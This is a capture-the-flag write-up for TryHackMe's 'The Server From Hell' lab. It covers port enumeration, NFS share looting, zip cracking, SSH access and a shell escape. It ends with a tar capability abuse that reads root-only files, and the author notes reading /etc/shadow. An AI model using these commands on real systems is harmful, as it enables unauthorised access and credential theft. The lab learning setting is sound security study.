THM: The Server From Hell
Introduction
Face a server that feels as if it was configured and deployed by Satan himself. Can you escalate to root?.
This is The Server from Hell from TryHackMe.
The only instruction says:
Start at port 1337 and enumerate your way.
I started an nmap scan but there was port spoofing turned on so I quickly cancelled it.
1337
nmap on port 1337 says:
PORT STATE SERVICE VERSION
1337/tcp open waste?
| fingerprint-strings:
| NULL:
| Welcome traveller, to the beginning of your journey
| begin, find the trollface
| Legend says he’s hiding in the first 100 ports
|_ printing the banners from the ports
So I run a command to get the banners from the first 100 ports:
root@kali:/opt/tryhackme/hellserver# nmap -p1-100 -sV --script=banner 10.10.179.4
In amongst the nonsense I notice this:
21/tcp open ftp?
| banner: 550 12345 0f7000f800770008777 go to port 12345 80008f7f700880cf
12345
In the browser at port 12345 we get this message:
NFS shares are cool, especially when they are misconfigured
It’s on the standard port, no need for another scan
NFS
We can mount the share and download the contents - a zip file. It’s password protected but John handles it easily:
Right, so we got some SSH keys, a hint and a flag. The hint just says:
2500-4500
Presumably we need to identify the correct port for SSH.
SSH
I run this nmap scan:
root@kali:/opt/tryhackme/hellserver# nmap -T4 -p2500-4500 -sV -sC 10.10.179.4 -oA nmap/tcp_ssh_search
It takes quite a while, but when it’s done I grep the results for SSH and find the port - 3333.
root@kali:/opt/tryhackme/hellserver/nmap# cat tcp_ssh_search.nmap | grep ssh
3333/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
Then I can log in as hades
root@kali:/opt/tryhackme/hellserver# ssh -p 3333 -i home/hades/.ssh/id_rsa hades@10.10.179.4
irb
We’re in a shell which I haven’t seen before - the prompt is irb. Google tells me it’s interactive ruby. I lookup how to list and read files to get user.txt:
That’s all well and good but let’s get out:
irb(main):006:0> exec '/bin/bash'
And we have a normal bash shell.
Privesc, of sorts
I ran linpeas and it said that tar had the capability CAP_DAC_READ_SEARCH which can Bypass file read permission checks and directory read and execute permission checks. So we can read the root flag with that (per GTFOBins):
tar xf "/root/root.txt" -I '/bin/sh -c "cat 1>&2"'
And that gets the flag but it doesn’t make us root. I also read /etc/shadow and grabbed the hash so maybe that could be broken - I didn’t try. I checked a couple of other people’s writeups at this point to see if any of them had a way to use tar to actually become root, but none of them had - they all just read the flag like I did. So I guess it’s done.